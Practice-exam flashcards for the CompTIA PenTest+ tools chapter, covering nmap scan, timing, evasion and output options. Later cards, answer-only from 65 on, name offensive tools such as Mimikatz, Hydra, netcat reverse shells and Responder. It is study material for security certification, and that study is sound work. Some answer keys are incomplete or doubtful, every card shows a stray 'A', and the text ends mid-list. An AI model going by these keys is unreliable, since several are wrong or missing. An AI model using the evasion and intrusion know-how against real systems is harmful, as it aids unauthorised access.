CompTIA PenTest+ Practice Test Chapter 4 Penetration Testing Tools (Sybex: Panek, Crystal, Tracy) Flashcards

Question 1

Q

You are conducting a gray box penetration test for a client. You have identified an internal host with an IP address of 192.168.1.1 as a potential target. You need to use the nmap utility on your laptop to run a SYN port scan of this host. Which command should you use to do this?

A.nmap 192.168.1.1 -sS
B.nmap 192.168.1.1 -sT
C.nmap 192.168.1.1 -sU
D.nmap 192.168.1.1 -sA

Answer

A

A.nmap 192.168.1.1 -sS

Explanation:
The –sS option causes the nmap utility to conduct a SYN port scan of the specified target system.

Question 2

Q

You are conducting a white box penetration test for a client. You need to use the nmap utility on your laptop to run a scan of every host on the 192.168.1.0 subnet (which uses a subnet mask of 255.255.255.0). Which commands could you use to do this? (Choose two.)

A.nmap 192.168.1.0 
B.nmap 192.168.1.0-255 
C.nmap 192.168.1.0 –m:255.255.255.0 
D.nmap 192.168.1.0/24 
E.nmap 192.168.1.1-254

Answer

A

D.nmap 192.168.1.0/24
E.nmap 192.168.1.1-254

Explanation:
The nmap 192.168.1.0/24 command causes the nmap utility to scan every system on the subnet, from .1 to .254.
Likewise, the nmap 192.168.1.1-254 command causes the nmap utility to scan every system on the subnet, from .1 to .254.

Question 3

Q

You are conducting a gray box penetration test for a client. You have identified an internal host with an IP address of 192.168.1.1 as a potential target. You need to use the nmap utility on your laptop to run a SYN port scan of this host. Which commands could you use to do this? (Choose two.)

A.nmap 192.168.1.1 –sS 
B.nmap 192.168.1.1 
C.nmap 192.168.1.1 -sV 
D.nmap 192.168.1.1 -O 
E.nmap 192.168.1.1 –T0

Answer

A

A.nmap 192.168.1.1 –sS
B.nmap 192.168.1.1

Explanation:
The nmap 192.168.1.1 -sS command causes the nmap utility to conduct a SYN port scan of the specified target system. Likewise, the nmap 192.168.1.1 command also causes the nmap utility to conduct a SYN port scan of the specified target system because a SYN scan is the default used if no other scan type is specified.

Question 4

Q

You are conducting a gray box penetration test for a client. You have identified an internal host with an IP address of 192.168.1.1 as a potential target. You need to use the nmap utility on your laptop to determine the operating system running on this host. Which command should you use to do this?

A.nmap 192.168.1.1 –sS
B.nmap 192.168.1.1 –sL
C.nmap 192.168.1.1 -sV
D.nmap 192.168.1.1 -O

Answer

A

D.nmap 192.168.1.1 -O

Explanation:
The nmap 192.168.1.1 -O command causes the nmap utility to use TCP/IP stack fingerprinting to determine the operating system installed on the remote host.

Question 5

Q

You are conducting a gray box penetration test for a client. You have identified an internal host with an IP address of 192.168.1.1 as a potential target. You need to use the nmap utility on your laptop to determine the operating system running on this host. Which command could you use to do this?

A.nmap 192.168.1.1 –A
B.nmap 192.168.1.1 –T1
C.nmap 192.168.1.1 -sT
D.nmap 192.168.1.1 -f

Answer

A

A.nmap 192.168.1.1 –A

Explanation:

The nmap 192.168.1.1 -A command enables OS detection, service version detection, script scanning, and traceroute to the remote host.

Question 6

Q

You are conducting a gray box penetration test for a client. You have identified an internal host with an IP address of 192.168.1.1 as a potential target. You need to use the nmap utility on your laptop to run a TCP connect scan of this host.
Which command should you use to do this?

A.nmap 192.168.1.1 –sL
B.nmap 192.168.1.1 –T1
C.nmap 192.168.1.1 -sT
D.nmap 192.168.1.1 -f

Answer

A

C.nmap 192.168.1.1 -sT

Explanation:
The nmap 192.168.1.1 -sT command causes the nmap utility to conduct a TCP connect scan of the specified target system.

Question 7

Q

You are conducting a gray box penetration test for a client. You have identified an internal host with an IP address of 192.168.1.1 as a potential target. You need to use the nmap utility on your laptop to run a UDP port scan of this host. Which command should you use to do this?

A.nmap 192.168.1.1 –sL
B.nmap 192.168.1.1 –U
C.nmap 192.168.1.1 -sT
D.nmap 192.168.1.1 -sU

Answer

A

D.nmap 192.168.1.1 -sU

Explanation:
The nmap 192.168.1.1 -sU command causes the nmap utility to conduct a UDP port scan of the specified target system.

Question 8

Q

You are conducting a gray box penetration test for a client. You need to use the nmap utility on your laptop to discover all the hosts on the 192.168.1.0 subnet (which uses a subnet mask of 255.255.255.0) without actually scanning those hosts. Which command should you use to do this?

A.nmap 192.168.1.0/24 –sL
B.nmap 192.168.1.0/24 –list
C.nmap 192.168.1.1-254 -sW
D.nmap 192.168.1.1-254 -sM

Answer

A

A.nmap 192.168.1.0/24 –sL

Explanation:
The nmap 192.168.1.0/24 -sL command causes the nmap utility to scan the specified range of IP addresses for hosts. It simply lists targets to scan.

Question 9

Q

You are conducting a gray box penetration test for a client. You have identified an internal host with an IP address of 192.168.1.1 as a potential target. You need to use the nmap utility on your laptop to run a TCP ACK scan of this host. Which command should you use to do this?

A.nmap 192.168.1.1 –sA
B.nmap 192.168.1.1 –T1
C.nmap 192.168.1.1 -sT
D.nmap 192.168.1.1 -ACK

Answer

A

A.nmap 192.168.1.1 –sA

Explanation:
The nmap 192.168.1.1 -sA command causes the nmap utility to conduct a TCP ACK scan of the specified target system.

Question 10

Q

You are conducting a white box penetration test for a client. You need to use the nmap utility on your laptop to run a scan of every host on the 192.168.1.0 subnet (which uses a subnet mask of 255.255.255.0), but without scanning the host with an IP address of 192.168.1.250 (which you suspect is a honeypot host). Which command should you use to do this?

A.nmap 192.168.1.1-254
B.nmap 192.168.1.0/24 –noscan 192.168.1.250
C.nmap 192.168.1.0/24 –exclude 192.168.1.250
D.nmap 192.168.1.1-254 –skip 192.168.1.250

Answer

A

C.nmap 192.168.1.0/24 –exclude 192.168.1.250

Explanation:
The nmap 192.168.1.0/24 –exclude 192.168.1.250 command causes the nmap utility to scan every system on the subnet from .1 to .254 but skips the host with an IP address of 192.168.1.250.

Question 11

Q

You are conducting a gray box penetration test for a client. You need to use the nmap utility on your laptop to run a TCP ACK scan of hosts on the network with IP addresses of 192.168.1.10, 192.168.1.11, and 192.168.1.13. Which command should you use to do this?

A.nmap 192.168.1.10-13 –sA
B.nmap 192.168.1.0/24 –sA
C.nmap 192.168.1.10/24 -sA
D.nmap 192.168.1.10-13 –sT

Answer

A

A.nmap 192.168.1.10-13 –sA

Explanation:
The nmap 192.168.1.10-13 -sA command causes the nmap utility to conduct a TCP ACK scan of the target systems with IP addresses of 192.168.1.10, 192.168.1.11, and 192.168.1.13.

Question 12

Q

You are conducting a gray box penetration test for a client. You need to use the nmap utility on your laptop to run a UDP scan of hosts on the network with IP addresses of 192.168.1.10, 192.168.1.11, 192.168.1.13, and 192.168.1.15. Which command should you use to do this?

A.nmap 192.168.1.10-15 –sU
B.nmap 192.168.1.0/24 –sU
C.nmap 192.168.1.10 192.168.1.11 192.168.1.12 192.168.1.13 192.168.1.15 -sU
D.nmap 192.168.1.10 192.168.1.11 192.168.1.12 192.168.1.13 192.168.1.15 –U

Answer

A

C.nmap 192.168.1.10 192.168.1.11 192.168.1.12 192.168.1.13 192.168.1.15 -sU

Explanation:
Because the hosts to be scanned do not have contiguous IP addresses, you must specify each host individually. In this case, the nmap 192.168.1.10 192.168.1.11 192.168.1.12 192.168.1.13 192.168.1.15 -sU command causes the nmap utility to conduct a UDP port scan of each specified system.

Question 13

Q

You are conducting a gray box penetration test for a client. You need to use the nmap utility on your laptop to discover all of the hosts on the 192.168.1.0 subnet (which uses a subnet mask of 255.255.255.0) without actually scanning any ports on those hosts. Which command should you use to do this?

A.nmap 192.168.1.0/16 –sL
B.nmap 192.168.1.1-254 -sn
C.nmap 192.168.1.1-254 -sW
D.nmap 192.168.1.0/16 -sM

Answer

A

B.nmap 192.168.1.1-254 -sn

Explanation:
The nmap 192.168.1.1-254 -sn command causes the nmap utility to scan the specified range of IP addresses for hosts. It lists all the hosts found without actually scanning any of their ports.

Question 14

Q

You are conducting a gray box penetration test for a client. You need to use the nmap utility on your laptop to discover all of the hosts on the 192.168.1.0 subnet (which uses a subnet mask of 255.255.255.0) that have the Telnet port open.
Which command should you use to do this?

A.nmap 192.168.1.0/24 –s 23
B.nmap 192.168.1.0/24 –p 21
C.nmap 192.168.1.1-254 –p 21
D.nmap 192.168.1.1-254 –p 23

Answer

A

D.nmap 192.168.1.1-254 –p 23

Explanation:
The nmap 192.168.1.1-254 –p 23 command causes the nmap utility to scan the specified range of IP addresses for hosts with Telnet port 23 open.

Question 15

Q

You are conducting a gray box penetration test for a client. You need to use the nmap utility on your laptop to scan all of the ports on a network host with an IP address of 192.168.1.2. Which command should you use to do this?

A.nmap 192.168.1.2 -p-
B.nmap 192.168.1.2 –p all
C.nmap 192.168.1.2 –s all
D.nmap 192.168.1.2 –p 1-1024

Answer

A

A.nmap 192.168.1.2 -p-

Explanation:
The nmap 192.168.1.2 -p- command causes the nmap utility to scan all ports on the specified host. Be aware that the scan will take some time to complete because of the number of ports involved.

Question 16

Q

You are conducting a gray box penetration test for a client. You use the nmap utility to see whether the Telnet service is running on a Linux server you discovered. The output of the command indicates that the Telnet port state is Filtered. What does this likely mean?

A.The Telnet service is installed but not running.
B.The Telnet service is not installed.
C.The Telnet service is not installed, and a different service is using its default port.
D.The Telnet service is installed and running, but a host firewall is blocking it.

Answer

A

D.The Telnet service is installed and running, but a host firewall is blocking it.

Explanation:
When nmap indicates a port is filtered, it usually means the associated service is installed and running, but a host firewall is blocking the port.

Question 17

Q

You are conducting a gray box penetration test for a client. You use the nmap utility to see whether the Telnet service is running on a Linux server you discovered. The output of the command indicates that the Telnet port state is Open. What does this mean?

A.The Telnet service is installed but not running.
B.The Telnet service is installed, running, and accessible.
C.The Telnet service is not installed, and a different service is using its default port.
D.The Telnet service is not installed.

Answer

A

B.The Telnet service is installed, running, and accessible.

Explanation:
When nmap indicates a port is open, it usually means the associated service is installed, is running, and is accessible through the host firewall.

Question 18

Q

You are conducting a gray box penetration test for a client. You use the nmap utility to see whether the Telnet service is running on a Linux server you discovered. The output of the command indicates that the Telnet port state is Closed. What could this mean? (Choose two.)

A.The Telnet service is installed but not running.
B.The Telnet service is installed, running, and accessible.
C.The Telnet service is not installed, and a different service is using its default port.
D.The Telnet service is not installed.
E.The Telnet service is installed and running, but a host firewall is blocking it.

Answer

A

A.The Telnet service is installed but not running.

Explanation:
When nmap indicates a port is closed, it usually means either the associated service is not installed at all or it has been installed but currently isn’t running. Therefore, nothing is listening on its associated port.

Question 19

Q

A penetration tester uses the nmap utility to send a TCP SYN packet to a target host. The target host responds with a SYN ACK packet, but instead of finishing the connection, nmap sends a reset packet to the target host. Which option did the tester use with the nmap command?

A.-sS
B.-sT
C.-sU
D.-sL

Answer

A

A.-sS

Explanation:
The –sS option causes nmap to run a TCP SYN scan. In this scan, nmap sends a TCP SYN packet to a target host, and then the target host responds with a SYN ACK packet. However, instead of finishing the connection, nmap sends a reset packet to the target host.

Question 20

Q

Which command option causes nmap to detect services running on a target host and report the version number of any services found?

A.-sS
B.-sT
C.-sU
D.-sV

Answer

A

D.-sV

Explanation:
All of the options shown in this question will cause nmap to detect services running on the target host. However, only the –sV option can be used with nmap to detect the version number of those services.

Question 21

Q

Which command option will cause nmap to scan just UDP port 20 and TCP ports 21 and 22?

A.-p 20-22
B.–top-ports 1024
C.-p U:20,T:21,22
D.-p-

Answer

A

C.-p U:20,T:21,22

Explanation:
The -p U:20,T:21,22 command tells nmap to just scan UDP port 20 and TCP ports 21 and 22. The other options in this question will also scan these ports; however, they also scan many other unwanted ports.

Question 22

Q

As a penetration tester, you want to scan a Linux server with an IP address of 192.168.1.200 in the target network and see whether it has a web server installed and running. Which nmap commands will do this? (Choose two.)

A.nmap 192.168.1.200 –p http,https
B.nmap 192.168.1.200 –sn 80,443
C.nmap 192.168.1.200 –p 80,443
D.nmap 192.168.1.200 –T4 80,443

Answer

A

A.nmap 192.168.1.200 –p http,https
C.nmap 192.168.1.200 –p 80,443

Explanation:
Either the –p http,https option or the –p 80,443 option can be used with nmap to scan a host for a web server service.

Question 23

Q

As a penetration tester, you want to scan a Linux server with an IP address of 192.168.1.200 in the target network for the 1000 most popular network services to see whether they are installed and running. However, you already know this host is running the DNS service, so you want to skip this port in the scan. Which nmap command will do this?

A.nmap 192.168.1.200 –p 1-1000 –exclude-ports 53
B.nmap 192.168.1.200 –top-ports 1000 –exclude-ports 53
C.nmap 192.168.1.200 –well-known-ports –exclude-ports 53
D.nmap 192.168.1.200 –top-ports 1000

Answer

A

B.nmap 192.168.1.200 –top-ports 1000 –exclude-ports 53

Explanation:
The –top-ports 1000 option tells nmap to scan the default ports used by the 1,000 most popular network services. The –exclude-ports 53 option tells nmap to skip port 53 (the default port used by DNS servers) during the scan.

Question 24

Q

You have created a list of target hosts that you want to scan with nmap and saved it to a text file named /root/targets.txt. Which command should you use to run the scan using this file?

A.nmap -iR /root/targets.txt
B.nmap –file /root/targets.txt
C.nmap -iL /root/targets.txt
D.nmap -iF /root/targets.txt

Answer

A

C.nmap -iL /root/targets.txt

Explanation:
The -iL file_name option tells nmap to read the specified file and scan only those hosts listed in the file.

Question 25

Q

A penetration tester wants to run a port scan on all hosts on the 192.168.1.0 subnet (with a subnet mask of 255.255.255.0) without actually discovering the hosts first. Which command should she use?

A.nmap 192.168.1.0/24 -Pn
B.nmap 192.168.1.0/24 -sL
C.nmap 192.168.1.0/24 -sn
D.nmap 192.168.1.0/24 -n

Answer

A

A.nmap 192.168.1.0/24 -Pn

Explanation:
The -Pn option tells nmap to scan a host (or an entire subnet) without actually discovering hosts. This type of scan should be avoided during a penetration test because it takes a long time; each port on each IP address in the range is scanned, regardless of whether the IP address is valid. Because of this, it also creates a tremendous amount of traffic that may be detected by an IDS or IPS tool.

Question 26

Q

A penetration tester is using nmap to scan hosts on the target network. The client uses an aggressive IPS tool and employs an experienced IT staff that she needs to avoid. Which timing option should she use with nmap to avoid detection? (Assume that time is not an issue.)

A.-T1
B.-T3
C.-T4
D.-T5

Answer

A

A.-T1

Explanation:
The –T1 option tells nmap to scan in sneaky mode. In this mode, a port will be scanned once every 15 seconds. As such, this type of scan is very slow. However, the slowness also makes the scan harder to detect.

Question 27

Q

A penetration tester is using nmap to scan hosts on the target network. The client has a lax security posture and employs a relatively inexperienced IT staff. Which timing option could she consider using with nmap to speed up her scans?

A.-T1
B.-T2
C.-T3
D.-T4

Answer

A

D.-T4

Explanation:
The –T4 option tells nmap to scan in aggressive mode. This type of scan runs quite quickly. However, the speed also makes the scan easier to detect by IDS/IPS systems or the target’s IT staff.

Question 28

Q

A penetration tester runs an nmap scan without specifying a timing option. Which one is used by default?

A.-T1
B. -T2 
C.-T3 
D.-T4 
E.-T0

Answer

A

C.-T3

Explanation:
If the nmap command is run without specifying a timing option, then the –T3 option is used by default. This tells nmap to scan in normal mode.

Question 29

Q

Which nmap timing option causes it to scan in Paranoid mode?

A.-T0 
B.-T1 
C.-T2 
D.-T3 
E.-T4

Answer

A

A.-T0

Explanation:
The –T0 option causes nmap to scan in paranoid mode, in which only one port is scanned on a target host every five minutes. While this mode can be used to run the stealthiest scans, it also causes them to run incredibly slowly.

Question 30

Q

Which nmap timing option causes it to scan in Insane mode?
A.-T5
B.-T4
C.-T3 
D.-T2 
E.-T1

Answer

A

A.-T5

Explanation:
The –T5 option causes nmap to scan in insane mode. This is the fastest type of nmap scan. However, the speed also makes it easier to detect by IDS/IPS tools or the target’s IT staff.

Question 31

Q

Which nmap timing option causes it to scan in Polite mode?

A.-T0 
B.-T1 
C.-T2 
D.-T3 
E.-T4

Answer

A

C.-T2

Explanation:
The –T2 option causes nmap to scan in polite mode. This type of scan runs quite slowly. However, the slowness also makes the scan harder to detect.

Question 32

Q

Which option causes nmap to save its output to a standard text file in the file system of the host where it was run?

A.-oX
B.-oN
C.-oT
D.-oV

Answer

A

B.-oN

Explanation:
The –oN option causes nmap to write the output from the scan to a standard text file. You must specify a filename with this option.

Question 33

Q

Which option causes nmap to save its output to an XML-formatted text file in the file system of the host where it was run?

A.-oX
B.-oN
C.-oT
D.-oG

Answer

A

A.-oX

Explanation:
The –oX option causes nmap to write the output from the scan to an XML-formatted text file. You must specify a filename with this option.

Question 34

Q

Which option causes nmap to save its output to a text file that can be quickly searched using the grep command?

A.-oV
B.-oN
C.-oT
D.-oG

Answer

A

D.-oG

Explanation:
The –oG option causes nmap to write the output from the scan to a text file in a format that allows it to be quickly searched using the grep command. You must specify a filename with this option.

Question 35

Q

Which option causes nmap to save its output in a normal text file, in an XML-formatted text file, and in a greppable text file all at once?

A.-oX
B.-oN
C.-oA
D-oG

Answer

A

C.-oA

Explanation:
The –oA option causes nmap to write the output from the scan to a normal text file, in an XML-formatted text file, and in a greppable text file all at once. You must specify a base filename with this option. A different extension will be added to each of the files generated using this base filename. The normal file will have an .nmap extension, the greppable file will have a .gnmap extension, and the XML file will have an .xml extension.

Question 36

Q

Which option causes nmap to scan using tiny, fragmented packets in an attempt to fool a packet filtering firewall?

A.-f
B.-Pn
C.-n
D.-sC

Answer

A

A.-f

Explanation:
The –f option causes nmap to scan using tiny, fragmented packets. Sometimes these small packets can be more difficult for packet filtering firewalls to properly analyze.

Question 37

Q

Which option causes nmap to send scans from a spoofed IP address?

A.-f
B.-D
C.-n
D.-sF

Answer

A

B.-D

Explanation:
The –D option causes nmap to send scans from a spoofed IP address. You can specify one or more fake source IP addresses using this option.

Question 38

Q

Which option causes nmap to scan a specified number of random hosts?

A.-iL
B.-sS
C.-sR
D.-iR

Answer

A

D.-iR

Explanation:
The –iR option causes nmap to scan a specified number of random hosts. For example, if you wanted to scan 50 random hosts, you would use the –iR 50 option with the nmap command.

Question 39

Q

Which option causes nmap to scan a host for the 100 most commonly used IP ports, such as 20, 21, 23, 25, 53, 80, etc.?

A.-p-
B.-sV
C.-F
D.-p 100

Answer

A

C.-F

Explanation:
The –F option causes nmap to scan a specified number host for the 100 most commonly used IP ports. For example, this scan would include ports 20, 21, 23, 25, 53, 80, and so on. Sometimes, this is called a fast port scan.

Question 40

Q

Which nmap option causes the utility to relay connections through a proxy server?

A.–proxies
B.-S
C.-D
D.-g

Answer

A

A.–proxies

Explanation:
The –proxies option causes nmap to relay connections through a proxy server. You need to include the IP address of one or more proxy servers with this option.

Question 41

Q

Consider the following image: Which nmap commands could have been used to generate this output? (Choose two.)

A.nmap 10.0.0.1
B.nmap 10.0.0.1 -sS
C.nmap 10.0.0.1 -sL
D.nmap 10.0.0.1 -sn

Answer

A

A.nmap 10.0.0.1
B.nmap 10.0.0.1 -sS

Explanation:
In this example, the nmap utility was used to run a TCP SYN scan. Both the nmap 10.0.0.1 and nmap 10.0.0.1 –sS commands can be used to run this kind of scan.

Question 42

Q

Consider the following image: Which nmap command could have been used to generate this output?

A.nmap 10.0.0.1 -PA
B.nmap 10.0.0.1 -sT
C.nmap 10.0.0.1 -sL
D.nmap 10.0.0.1 -sn

Answer

A

B.nmap 10.0.0.1 -sT

Explanation:
In this example, the nmap utility was used to run a TCP connect scan. The nmap 10.0.0.1 –sT command can be used to run this kind of scan. Note that the output of the command looks almost identical to the output of a TCP SYN scan.

Question 43

Q

Consider the following image: Which nmap command could have been used to generate this output?

A.nmap 10.0.0.1
B.nmap 10.0.0.1 -sS
C.nmap 10.0.0.1 -sU
D.nmap 10.0.0.1 -sT

Answer

A

C.nmap 10.0.0.1 -sU

Explanation:
In this example, the nmap utility was used to run a UDP scan. The nmap 10.0.0.1 –sU command can be used to run this kind of scan. Note that the output of the command looks almost identical to the output of a TCP SYN scan; however, it lists UDP ports instead of TCP ports.

Question 44

Q

Consider the following image: Which nmap command could have been used to generate this output?

A.nmap 10.0.0.1 -sA
B.nmap 10.0.0.1 -sS
C.nmap 10.0.0.1 -sU
D.nmap 10.0.0.1 -sT

Answer

A

A.nmap 10.0.0.1 -sA

Explanation:
In this example, the nmap utility was used to run a TCP ACK port scan. The nmap 10.0.0.1 –sA command can be used to run this kind of scan.

Question 45

Q

Consider the following image:

Which nmap command could have been used to generate this output?

A.nmap 10.0.0.5 -v
B.nmap 10.0.0.5 -sS
C.nmap 10.0.0.5 -sU
D.nmap 10.0.0.5 -sT

Answer

A

A.nmap 10.0.0.5 -v

Explanation:
In this example, the nmap utility was used to run a TCP SYN scan. However, the –v option was included to increase the verboseness of the output.

Question 46

Q

Consider the following image: Which nmap command could have been used to generate this output?

A.nmap 10.0.0.5
B.nmap 10.0.0.5 -sS
C.nmap 10.0.0.5 –sU -vv
D.nmap 10.0.0.5 –sT -v

Answer

A

C.nmap 10.0.0.5 –sU -vv

Explanation:
In this example, the nmap utility was used to run a UDP scan. However, the –vv option was included to greatly increase the verboseness of the output.

Question 47

Q

Consider the following image: Which nmap command could have been used to generate this output?

A.nmap 10.0.0.1-10
B.nmap 10.0.0.1-10 -sL
C.nmap 10.0.0.1-10 –Pn
D.nmap 10.0.0.1-10 –PS

Answer

A

B.nmap 10.0.0.1-10 -sL

Explanation:
In this example, the nmap utility was used to simply list available targets. This is done by running nmap with the –sL option. This causes nmap to list hosts, but not actually scan them.

Question 48

Q

Consider the following image: Which nmap command could have been used to generate this output?

A.nmap 10.0.0.1-10
B.nmap 10.0.0.1-10 -sL
C.nmap 10.0.0.1-10 –sn
D.nmap 10.0.0.1-10 –PR

Answer

A

C.nmap 10.0.0.1-10 –sn

Explanation:
In this example, the nmap utility was used to discover available targets. This is done by running nmap with the –sn option. This causes nmap to discover hosts, but not actually scan any of their ports.

Question 49

Q

Consider the following image: Which nmap command could have been used to generate this output?

A.nmap 10.0.0.1-10 –p 80
B.nmap 10.0.0.1-10 -F
C.nmap 10.0.0.1-10 –sn 80
D.nmap 10.0.0.1-10 –p-

Answer

A

A.nmap 10.0.0.1-10 –p 80

Explanation:
In this example, the nmap utility was used to scan port 80 on each of the 10 hosts listed in the range of IP addresses. This is done by running nmap with the –p

Question 50

Q

Consider the following image: Which nmap command could have been used to generate this output?

A.nmap 10.0.0.5
B.nmap 10.0.0.5 -sS
C.nmap 10.0.0.5 –sV
D.nmap 10.0.0.5 –sT

Answer

A

C.nmap 10.0.0.5 –sV

Explanation:
In this example, the nmap utility was used to scan the open ports on the host listed in the command and then determine the version of the service using each of those ports. This is done by running nmap with the –sV option.

Question 51

Q

As a part of a penetration test, you need to perform reconnaissance on the target organization to passively gather information. Which tools could you use to do this? (Choose two.)

A.whois 
B.Metasploit Framework 
C.OpenVAS 
D.nslookup 
E.Nessus

Answer

A

A.whois
D.nslookup

Explanation:
The whois and nslookup utilities can be used to passively conduct reconnaissance on the target organization. Because they report information that is available to the general public, using these tools is highly unlikely to arouse any suspicion.

Question 52

Q

As a part of a penetration test, you need to establish an active connection to the computer systems and devices at the target organization to enumerate and fingerprint them. Which tools could you use to do this? (Choose two.)

A.whois 
B.nmap 
C.hping 
D.Aircrack-ng 
E.John the Ripper

Answer

A

B.nmap
C.hping

Explanation:
The nmap and hping utilities can be used to actively enumerate and fingerprint target systems.

Question 53

Q

As a part of a penetration test, you need to gather user account names and passwords from the passwd and shadow files from a Linux server. Which utilities could you use to do this? (Choose two.)

A.John the Ripper 
B.Cain and Abel 
C.Kismet 
D.Censys 
E.Recon-ng

Answer

A

A.John the Ripper
B.Cain and Abel

Explanation:
John the Ripper as well as Cain and Abel can be used to crack passwords from an offline database of user accounts, such as the shadow and passwd files from a Linux system.

Question 54

Q

As a part of a penetration test, you need to perform an in-depth scan of a target to identify vulnerabilities, such as missing updates or misconfigured security settings. Which utilities could you use to do this?

A.Censys 
B.theHarvester 
C.Shodan 
D.OWASP ZAP 
E.Nessus

Answer

A

D.OWASP ZAP
E.Nessus

Explanation:
OWASP ZAP as well as Nessus can be used to scan a target for vulnerabilities.

Question 55

Q

A penetration tester is performing a gray box test for a client. The tester decides to run a brute-force attack against a SQL database. Which utility could be used to do this?

A.John the Ripper
B.SQLmap
C.WiFite
D.Nikto

Answer

A

B.SQLmap

Explanation:
SQLmap can be used to brute-force crack the password for an SQL database.

Question 56

Q

A penetration tester is performing a gray box test for a client. The tester wants to try to generate a Kerberos “golden ticket” to compromise services within the target Active Directory domain. Which utility could be used to do this?

A.Mimikatz
B.John the Ripper
C.W3AF
D.ncat

Answer

A

A.Mimikatz

Explanation:
Mimikatz can be used to compromise Kerberos-based authentication systems, including generating “golden” and “silver” Kerberos tickets.

Question 57

Q

Which of the following utilities can be categorized as vulnerability scanners? (Choose two.)

A.Nikto 
B.SET 
C.W3AF 
D.Medusa
E.Hydra

Answer

A

A.Nikto
C.W3AF

Explanation:
Both Nikto and W3AF utilities are commonly used to scan targets for vulnerabilities.

Question 58

Q

Which of the following are commonly used to perform brute-force password attacks? (Choose two.)

A.BeFF 
B.Drozer 
C.W3AF 
D.Medusa 
E.Hydra

Answer

A

D.Medusa
E.Hydra

Explanation:
Both Medusa and Hydra utilities can be used to conduct brute-force password attacks.

Question 59

Q

Which of the following can be used to perform brute-force password attacks? (Choose two.)

A.Empire 
B.Patator 
C.Powersploit 
D.Aircrack-ng 
E.APK Studio

Answer

A

B.Patator
D.Aircrack-ng

Explanation:
Both Patator and Aircrack-ng utilities can be used to conduct brute-force password attacks. Patator can be used to compromise a variety of network services, such as FTP, SNMP, and SSH servers. Aircrack-ng is used to brute-force wireless networks.

Question 60

Q

Which of the following penetration tools are based on Windows PowerShell? (Choose two.)

A.BeEF 
B.SET 
C.Empire 
D.PowerSploit 
E.Hopper

Answer

A

C.Empire
D.PowerSploit

Explanation:
Both Empire and PowerSploit utilities are based on Windows PowerShell. Essentially, they are a collection of

Question 61

Q

Which utility is used to conduct social engineering exploits?

A.Responder 
B.SET 
C.APKX 
D.Immunity debugger 
E.Hopper

Answer

A

B.SET

Explanation:
The Social Engineer Toolkit (SET) is an open source penetration testing utility designed to conduct social engineering exploits.

Question 62

Q

Which penetration testing utility is focused on exploiting web browsers?

A.BeEF 
B.foremost 
C.FTK 
D.EnCase 
E.Tableau

Answer

A

A.BeEF

Explanation:
The Browser Exploitation Framework (BeEF) is a penetration testing utility designed to exploit weaknesses in web browsers using client-side attacks.

Question 63

Q

As a part of a penetration test, you want to access a shell session on a target Windows server. Which utility could be used to do this?

A.Ollydbg
B.GDB
C.WinDBG
D.ncat

Answer

A

D.ncat

Explanation:
The ncat utility can be used to read, write, redirect, and encrypt network data. For example, it can be used to establish shell sessions with a variety of servers, including Windows, Linux, and UNIX systems.

Question 64

Q

As a part of a penetration test, you want to reverse compile the executable for an in-house developed application used by the target organization. Which of the following tools can be used to do this? (Choose two.)

A.IDA 
B.Hopper 
C.route 
D.Tableau 
E.FTK

Answer

A

A.IDA
B.Hopper

Explanation:
Both IDA and Hopper can be used for decompilation. During this process, an executable file is reverse-compiled into source code, allowing you to examine it for vulnerabilities.

Answer 65

A

C.foremost
E.FTK

Explanation:
Both foremost and FTK are forensic tools. They are used to gather and analyze digital evidence from a cyber crime scene.

Answer 66

A

A.Nikto

Explanation:
Although Nikto is usually considered a vulnerability scanner used by penetration testers, it can also be used by system administrators to verify configuration compliance within their networks, specifically with the configuration of their web servers.

Answer 67

A

D.proxychains

Explanation:
The proxychains tool allows you to perform penetration test tasks against a target organization and make the network traffic generated look like it came from an intermediary proxy system.

Answer 68

A

A.APK Studio
D.APKX
Explanation:
Both APK Studio and APKX can be used to debug or even decompile an Android executable.

Answer 69

A

A.AFL
D.Peach

Explanation:
Both AFL and Peach can be used to perform fuzzing on an application as part of software assurance.

Answer 70

A

A.Findsecbugs
B.YASCA

Explanation:
Findsecbugs and Yet Another Source Code Analyzer (YASCA) can be used to perform static application security testing (SAST) or dynamic application security testing (DAST) as part of software assurance.

Answer 71

A

C.hashcat

Explanation:
The hashcat utility can be configured to use GPUs instead of CPUs to perform password cracking operations. This can dramatically speed up the process as GPUs can perform this task much faster than standard CPUs can.

Answer 72

A

A.Hydra
E.Medusa

Explanation:
The many unsuccessful login attempts is a sure sign that the penetration tester is using a brute-force password cracking tool to gain access to the system. The Hydra and Medusa utilities are both capable of running a brute-force attack.

Answer 73

A

B.Medusa

Explanation:
This output was created by the Medusa utility. Medusa is a brute-force password cracking tool that sends one password after another to a given user account (administrator, in this case) in hopes of finding the right one.

Answer 74

A

B.CeWL

Explanation:
The CeWL utility can be configured to crawl the target organization’s website and gather keywords from the site that could possibly be used as passwords by employees and then save them in a list. The list can then be used to run a brute-force password attack.

Answer 75

A

D.Dirbuster

Explanation:
The Dirbuster utility is a brute-force utility that can be used by penetration testers to discover directories and files on a web server or an application server, including hidden files or directories.

Answer 76

A

A.John the Ripper

Explanation:
This output was created by John the Ripper. This credential testing tool is a brute-force password cracking utility. In this example, the root user’s password (toor) has been discovered.

Answer 77

A

A.whois

Explanation:
This output was created by the whois utility. This OSINT tool is used to gather public information about the target organization’s domain.

Answer 78

A

D.WiFite
E.Kismet

Explanation:
You could use either Kismet or WiFite to try to break the target organization’s wireless network. You could also use Aircrack-ng to accomplish this.

Answer 79

A

B.Burp Suite
C.OWASP ZAP

Explanation:
You could use either Burp Suite or OWASP ZAP. Both of these tools could be used to intercept network traffic flowing between users running a web browser and the target organization’s web application server. By proxying a connection, the penetration tester can read the contents of the intercepted traffic.

Answer 80

A

A.netcat

Explanation:
The netcat utility could be used to set up a reverse shell exploit that allows the tester to remotely control the compromised system.

Answer 81

A

D.ncat

Explanation:
The ncat utility is an updated and improved version of the older netcat utility.

Answer 82

A

A.ncat
B.netcat

Explanation:
Either the ncat or netcat remote access tool could be used to set up a bind shell exploit.

Answer 83

A

C.Drozer

Explanation:
The Drozer utility provides a complete security auditing and attack framework designed exclusively for mobile devices running the Android operating system.

Answer 84

A

B.APK Studio

Explanation:
APK Studio is a tool that you can use to reverse engineer an APK executable and analyze it for vulnerabilities.

Answer 85

A

A.APKX

Explanation:
Android APK Decompilation for the Lazy (APKX) is a Python wrapper that can extract Java source code directly from an Android APK executable.

Answer 86

A

D.Searchsploit

Explanation:
The searchsploit utility is a command-line search tool that is used to query the online Exploit-DB database for known exploits.

Answer 87

A

D.Responder

Explanation:
The responder utility can be used to conduct LLMNR and NBT-NS poisoning, potentially allowing the penetration tester to redirect clients to her laptop and capture their credentials in the form of usernames and hashed passwords.

Answer 88

